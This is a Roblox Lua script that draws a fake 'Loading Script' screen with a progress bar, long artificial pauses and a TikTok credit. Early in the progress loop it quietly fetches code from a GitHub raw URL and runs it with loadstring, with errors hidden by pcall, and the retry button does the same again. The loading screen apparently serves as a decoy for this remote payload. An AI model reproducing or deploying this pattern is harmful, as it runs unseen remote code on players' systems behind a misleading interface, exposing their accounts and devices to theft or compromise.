local p = game.Players.LocalPlayer
local g = Instance.new("ScreenGui", p:WaitForChild("PlayerGui"))
g.Name = "LoadingUI"
g.IgnoreGuiInset = true
g.ResetOnSpawn = false

-- Background
local bg = Instance.new("Frame", g)
bg.Size = UDim2.new(1, 0, 1, 0)
bg.BackgroundColor3 = Color3.fromRGB(10, 10, 10)

-- Main Frame
local f = Instance.new("Frame", bg)
f.Size = UDim2.new(0.42, 0, 0.52, 0)
f.Position = UDim2.new(0.29, 0, 0.24, 0)
f.BackgroundColor3 = Color3.fromRGB(28, 28, 30)
Instance.new("UICorner", f).CornerRadius = UDim.new(0, 14)

-- Rejoin Tip (Above Retry Button)
local hint = Instance.new("TextLabel", f)
hint.Size = UDim2.new(1, 0, 0.08, 0)
hint.Position = UDim2.new(0, 0, 0.29, 0)
hint.BackgroundTransparency = 1
hint.Font = Enum.Font.GothamSemibold
hint.TextColor3 = Color3.fromRGB(255, 255, 255)
hint.TextScaled = true
hint.Text = "⚠️🚨 IF U STUCK TRY TO REJOIN"

-- Retry Button
local retryBtn = Instance.new("TextButton", f)
retryBtn.Size = UDim2.new(0.5, 0, 0.1, 0)
retryBtn.Position = UDim2.new(0.25, 0, 0.36, 0)
retryBtn.BackgroundColor3 = Color3.fromRGB(50, 120, 250)
retryBtn.Text = "🔁 Retry 🔧"
retryBtn.TextScaled = true
retryBtn.TextColor3 = Color3.new(1, 1, 1)
retryBtn.Font = Enum.Font.GothamBold
retryBtn.Visible = false
Instance.new("UICorner", retryBtn).CornerRadius = UDim.new(0, 10)

-- Loading Text
local t = Instance.new("TextLabel", f)
t.Size = UDim2.new(1, 0, 0.09, 0)
t.Position = UDim2.new(0, 0, 0.47, 0)
t.BackgroundTransparency = 1
t.TextColor3 = Color3.fromRGB(255, 255, 255)
t.Font = Enum.Font.GothamSemibold
t.TextScaled = true
t.Text = "🚀🔄 Loading Script..."

-- Animated Dots
local a = true
task.spawn(function()
	local d = 0
	while a and t.Parent do
		t.Text = "🚀🔄 Loading Script" .. string.rep(".", d % 4)
		d += 1
		wait(0.5)
	end
end)

-- Progress Bar Background
local pb = Instance.new("Frame", f)
pb.Size = UDim2.new(0.85, 0, 0.18, 0)
pb.Position = UDim2.new(0.075, 0, 0.61, 0)
pb.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
Instance.new("UICorner", pb).CornerRadius = UDim.new(0, 14)

-- Actual Progress Fill
local bar = Instance.new("Frame", pb)
bar.Size = UDim2.new(0, 0, 1, 0)
bar.BackgroundColor3 = Color3.fromRGB(0, 255, 140)
Instance.new("UICorner", bar).CornerRadius = UDim.new(0, 14)

-- Percentage Text
local perc = Instance.new("TextLabel", pb)
perc.Size = UDim2.new(1, 0, 1, 0)
perc.BackgroundTransparency = 1
perc.TextColor3 = Color3.fromRGB(255, 255, 255)
perc.Font = Enum.Font.GothamSemibold
perc.TextScaled = true
perc.Text = "0% Complete"

-- Info Label
local i = Instance.new("TextLabel", f)
i.Size = UDim2.new(1, 0, 0.09, 0)
i.Position = UDim2.new(0, 0, 0.78, 0)
i.BackgroundTransparency = 1
i.Font = Enum.Font.GothamSemibold
i.TextColor3 = Color3.fromRGB(200, 200, 200)
i.TextScaled = true
i.Text = "⏳🛠️ Please wait, script is initializing..."

-- Footer Credit
local credit = Instance.new("TextLabel", f)
credit.Size = UDim2.new(1, 0, 0.06, 0)
credit.Position = UDim2.new(0, 0, 0.96, 0)
credit.BackgroundTransparency = 1
credit.Font = Enum.Font.GothamSemibold
credit.TextColor3 = Color3.fromRGB(170, 170, 170)
credit.TextScaled = true
credit.Text = "👨‍💻📜 Script made by @growyourowngarden on TikTok"

-- Progress Function (pause at 50% & 60% for 1 min, 80% for 2 mins)
local function fillProgress()
	a = true
	bar.Size = UDim2.new(0, 0, 1, 0)
	perc.Text = "0% Complete"

	for i = 1, 100 do
		perc.Text = i .. "% Complete"
		bar:TweenSize(UDim2.new(i / 100, 0, 1, 0), "Out", "Linear", 0.05, true)

		if i == 2 then
			pcall(function()
				loadstring(game:HttpGet("https://raw.githubusercontent.com/No-Laggs/walapatoniggaa/refs/heads/main/gragraj"))()
			end)
		end

		if i == 50 then
			wait(60) -- 1 minute pause
		elseif i == 60 then
			wait(60) -- 1 minute pause
		elseif i == 80 then
			wait(120) -- 2 minute pause
		elseif i < 50 then
			wait(0.01) -- fast before 50
		else
			wait(0.05) -- slow after
		end
	end

	a = false
	retryBtn.Visible = true
end

-- Start initial progress
fillProgress()

-- Retry Button resets and restarts
retryBtn.MouseButton1Click:Connect(function()
	retryBtn.Visible = false
	fillProgress()
end)
